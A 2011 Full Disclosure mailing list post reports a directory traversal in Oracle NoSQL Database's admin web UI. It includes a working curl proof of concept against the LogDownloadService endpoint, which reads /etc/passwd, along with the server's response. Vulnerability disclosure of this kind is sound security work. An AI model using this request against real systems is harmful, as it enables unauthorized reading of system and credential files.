Full Disclosure mailing list archives
Oracle NoSQL Directory Traversal
From: Buherátor <buherator () gmail com>
Date: Sat, 5 Nov 2011 18:58:20 +0100
Hi List, I don't know if this worth anything, because the manual says: "Oracle NoSQL Database is intended to be installed in a secure location where physical and network access to the store is restricted to trusted users. For this reason, at this time Oracle NoSQL Database's security model is designed to prevent accidental access to the data. It is not designed to prevent malicious access or denial-of-service attacks." Anyway, here is the deal: +++ $ curl -v http://127.0.0.1:5001/kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd * About to connect() to 127.0.0.1 port 5001 (#0) * Trying 127.0.0.1... connected * Connected to 127.0.0.1 (127.0.0.1) port 5001 (#0)
GET /kvadminui/LogDownloadService?log=../../../../../../../../../../../../../../../etc/passwd HTTP/1.1 User-Agent: curl/7.21.3 (i686-pc-linux-gnu) libcurl/7.21.3 OpenSSL/0.9.8o zlib/1.2.3.4 libidn/1.18 Host: 127.0.0.1:5001 Accept: */*
< HTTP/1.1 200 OK < Content-Type: application/octet-stream < Content-Length: 1668 < Content-Disposition: attachment; filename="../../../../../../../../../../../../../../../etc/passwd" < Server: Jetty(7.4.0.v20110414) < root:x:0:0:root:/root:/bin/bash daemon:x:1:1:daemon:/usr/sbin:/bin/sh bin:x:2:2:bin:/bin:/bin/sh sys:x:3:3:sys:/dev:/bin/sh sync:x:4:65534:sync:/bin:/bin/sync games:x:5:60:games:/usr/games:/bin/sh man:x:6:12:man:/var/cache/man:/bin/sh lp:x:7:7:lp:/var/spool/lpd:/bin/sh mail:x:8:8:mail:/var/mail:/bin/sh news:x:9:9:news:/var/spool/news:/bin/sh uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh proxy:x:13:13:proxy:/bin:/bin/sh [...] +++ Software: Oracle NoSQL Database 11gR2.1.1.100 Regards, Buherator _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
Current thread:
- Oracle NoSQL Directory Traversal Buherátor (Nov 05)
- Re: Oracle NoSQL Directory Traversal Valdis . Kletnieks (Nov 05)
- Re: Oracle NoSQL Directory Traversal Ed Carp (Nov 05)
- Re: Oracle NoSQL Directory Traversal Ryan Dewhurst (Nov 05)
- Re: Oracle NoSQL Directory Traversal Valdis . Kletnieks (Nov 05)
- Re: Oracle NoSQL Directory Traversal Ed Carp (Nov 05)
- Re: Oracle NoSQL Directory Traversal Valdis . Kletnieks (Nov 05)